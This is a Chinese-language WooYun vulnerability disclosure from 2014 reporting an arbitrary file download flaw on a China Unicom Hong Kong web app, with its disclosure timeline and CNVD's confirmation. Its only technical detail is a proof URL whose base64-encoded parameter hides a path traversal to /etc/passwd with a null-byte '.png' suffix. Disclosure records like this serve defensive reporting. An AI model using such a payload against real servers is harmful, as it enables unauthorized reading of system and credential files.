[公开漏洞]中国联通某公司任意文件下载

中国联通某公司任意文件下载 相关厂商： 中国联通某公司 漏洞作者：Focusstart 提交时间：2014-05-22 18:40 公开时间：2014-07-06 18:41 漏洞类型：任意文件遍历/下载 危害等级：高 自评Rank：12 漏洞状态： 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源：http://www.wooyun.org Tags标签： 任意文件遍历下载 联通 漏洞详情 披露状态：

2014-05-22：细节已通知厂商并且等待厂商处理中
2014-05-27：厂商已经确认，细节仅向厂商公开
2014-06-06：细节向核心白帽子及相关领域专家公开
2014-06-16：细节向普通白帽子公开
2014-06-26：细节向实习白帽子公开
2014-07-06：细节向公众公开

简要描述：

中国联通某公司任意文件下载

详细说明：

地址：http://hk.chinaunicom.com/app_mgr/app-mgr/appInfo?downloadPath=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n&m=down

漏洞证明：

见上

修复方案：

Null

版权声明：转载请注明来源 Focusstart@乌云 漏洞回应 厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-05-27 13:40

厂商回复：

CNVD确认并复现所述情况，向中国联通集团通报处置。

最新状态：

暂无